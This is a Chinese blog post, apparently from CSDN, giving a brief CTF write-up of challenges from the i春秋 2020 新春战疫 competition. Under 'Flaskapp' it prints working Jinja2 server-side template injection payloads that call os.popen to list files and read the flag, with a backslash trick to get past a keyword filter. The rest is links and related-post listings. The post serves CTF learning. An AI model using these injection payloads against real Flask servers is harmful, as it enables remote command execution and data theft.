i春秋新春战疫公益赛复现

最新推荐文章于 2020-04-04 00:13:05 发布
最新推荐文章于 2020-04-04 00:13:05 发布
阅读量1.5k 收藏
点赞数
分类专栏: # 比赛题目总结
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/104504926
版权

blaklist

以前做过BUU的强网杯随便注,不过当时的两种解法都不行,做了这道题算是又学会了一种方法,直接记录在BUU的博客里了:
https://blog.csdn.net/qq_44657899/article/details/103239145

Flaskapp

在decode界面可以进行进行注入,提交payload的base64编码即可。

{{ [].__class__.__base__.__subclasses__()[127].__init__.__globals__['po'+'pen']('ls').read()}}

在这里插入图片描述flag被过滤使用fla\g绕过。

{{ [].__class__.__base__.__subclasses__()[127].__init__.__globals__['po'+'pen']('cat  this_is_the_fla\g.txt').read()}}

在这里插入图片描述

ezupload

这道题因为不知道蚁剑的虚拟终端所以没做出来。。
在这里插入图片描述在这里插入图片描述

天问_Herbert555
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
i春秋2020新春公益部分WP
qq_41252520的博客
02-24 1004
文章目录0x0 easyRsa0x1 Easy_Rsaweb0x0 ezuploadReverse0x0 EasyVMpwn0x0 Some_thing_exceting0x1 Some_thing_interesting0x2 BorrowStack总结 #Crypto 0x0 easyRsa n = 27560959918385616419486273009594513460044316476...
i春秋2020新春公益WEB复现Writeup
A_dmin的博客
02-24 3366
Day1 简单的招聘系统 ezupload babyphp 盲注 Day2 blacklist Ezsqli easysqli_copy Day3 Flaskapp easy_thinking ezExpress node_game
i春秋2020新春疫战 SQL注入类型 writepup
a3320315的博客
02-24 945
招聘简历 这道题目是比较常见的bool注入 打开题目是一个注册登录界面 我们先尝试一下有没有注入点 我们先注册一个账号 这个时候我们在登录页面试一下有没有注入点 很明显的bool注入,1=1是恒成立的,如果and后面的条件不成立,就会返回登录失败~~ exp: # encoding=utf-8 import requests url = 'http://d3be80acd6b647538ef87...
2020年春秋新春战“疫”网络安全公益——盲注
qq_34106499的博客
03-04 709
准备总结一下常见的sql注入及过滤,拿出这道题来回顾一下
2020新春战疫网络安全公益第一天之盲注
克格莫
02-21 833
0x00感觉自己还是太菜了 0x01爆破数据库名: 测试WAF过滤了=<>select 此处直接给出注数据库名的脚本: def http_blindTime_get(url,payload): #记录发包时间 starttime = time.time() result = requests.get(url+payload) #记录收包时间 ...
20210103 BDFZ新春公开.pdf
06-27
c++竞学习者
2020年新春战“疫”—网络安全公益 -misc:code_in_morse附件.zip
02-21
2020年新春战“疫”—网络安全公益 -misc:code_in_morse附件
新春掼蛋邀请活动方案.doc
03-05
新春掼蛋邀请活动方案.doc
新春棋牌比新闻稿件.docx
12-07
新春棋牌比新闻稿件.docx
新春祝福PSD模板
09-03
2020年新春战疫网络安全公益解题记录
A1andNS's Blog
02-27 1089
2020年新春战疫网络安全公益解题记录 圆满落幕的比,可惜我就会2题web,我有点不太行啊。 简单的招聘系统 在用户登录界面存在万能密码绕过漏洞,存在SQL注入漏洞。经过检验是字符型漏洞。 我还发现新注册用户会覆盖原来的用户,使用万能密码绕过时,默认登录最新注册的用户。 注册新用户后,发现不是第一用户,而是第二个。说明原来就有一个。Blank Page需要是admin登录才可以看见,新注册用...
刷题之旅第43站,i春秋网络安全公益,misc题目: code_in_morse
cc菜的一批
02-22 1328
感谢i春秋平台提供题目 下载出来附件是一个流量包,使用wireshark进行分析http协议。 tcp流追踪发现图片内容进行摩尔斯加密。 摩尔斯解密。 再进行base32解密,生成图片。 脚本如下。 import base64 a='RFIE4RYNBINAUAAAAAGUSSCEKIAAAAEUAAAAA7AIAYAAAAEPFOMTWAAABANUSRCBKR4F53M52F3NWOAM...
2020新春战疫网络安全公益部分web writeup
st0ut的博客
02-25 1620
前言 最近因为疫情,在家里都没怎么出门,正好i春秋平台举办了2020新春战疫网络安全公益。学到了一些骚姿势,师傅们都tql了。。。 DAY1 简单的招聘系统 打开页面发现是一个登陆框,直接注册账号登陆进去。发现需要管理员登陆,才能解锁新功能。 在那里xss了半天,没有结果。。。。 最后重新回到登陆页面,使用万能密码登陆,发现能登进去,但是是我刚刚注册的账号,于是重新下发题目,,直接万能密码登陆,...
i春秋新春公益战(部分)wp
qq_43734081的博客
02-24 372
最近假期没事参加了比,写了wp Crytop 1.EaseyRSA 下载官方给的附件 是一个名为EasyRSA.py的文件 然后我们用py2x版本打开 看到这个样子,是不是觉得官方有点水,没错!!是的 直接附上我写好的RSA脚本 #! /usr/bin/env python2 # -*- coding: utf-8 -*- from libnum import n2s, s2n from ...
[原题复现][2020i春秋抗疫] WEB blanklist(SQL堆叠注入、handler绕过)
笑花大王
02-23 769
简介 今天参加i春秋新春抗疫 一道web没整出来 啊啊啊 好垃圾啊啊啊啊啊啊啊 晚上看群里赵师傅的buuoj平台太屌了分分钟上线 然后赵师傅还分享了思路用handler语句绕过select过滤。。。。 原题复现: 考察知识点:SQL注入漏洞-堆叠注入、注入绕过 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台...
i春秋新春战疫WriteUp
SkYe's Blog
04-04 380
Crypto 1. easy_rsa 下载附件,内容如下: n = 2756095991838561641948627300959451346004431647633784258546355310570186953169836630463767800860279900518160131081693539400304193044550980119655489778152996261634944213...
2020 年 V&N 内部考核 WriteUp
a3320315的博客
03-01 2634
CheckIN 源码 from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') # def flag(): # ...
i春秋新春战役PWN之signin(calloc不从tcache里取chunk)
seaaseesa的博客
02-26 1307
Signin(calloc不从tcache里取chunk) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,存在一个后门函数,要执行后面函数,需要ptr不为0 Delete功能没有清空指针 Edit功能存在UAF漏洞,但edit功能只能使用一次 测试出题目给我们的glibc版本为2.29,存在tcahce机制。 由于edit功能只用一次。同时,我们注...
re学习笔记(41)i春秋2020GYCTF-re-奇怪的安装包
逆向随笔
02-23 763
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 题目下载: 链接: https://pan.baidu.com/s/1N9NFUPITE9xcFCg7tnOPWw 提取码: 2020 压缩包,想到NSIS制作压缩包(其实没想到 然后使用7-zip打开Install.exe文件,查看[NSIS].nsi文件 找到判断的代码 Dialogs::InputBox 1 请输入ke...
python烟花新春盛宴
最新发布
02-09
Python烟花新春盛宴是一个由CSDN开发的Python编程活动,旨在庆祝中国传统新年。这个活动提供了一系列有趣的Python编程挑战和项目,让开发者们可以展示他们的编程技能和创造力。 在Python烟花新春盛宴中,你可以参与各种编程挑战,例如编写一个程序来模拟烟花爆炸的效果,或者设计一个交互式的烟花表演程序。你可以使用Python的图形库(如Pygame或Turtle)来实现这些挑战,并展示出令人惊叹的烟花效果。 此外,Python烟花新春盛宴还提供了一些教程和指南,帮助初学者入门Python编程,并了解如何使用Python创建炫酷的烟花效果。你可以学习如何使用循环、条件语句和函数等基本编程概念来实现这些效果。 参与Python烟花新春盛宴不仅可以锻炼你的编程技能,还可以与其他开发者交流和分享经验。你可以在CSDN的论坛或社区中与其他参与者讨论问题、交流心得,并互相激励。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值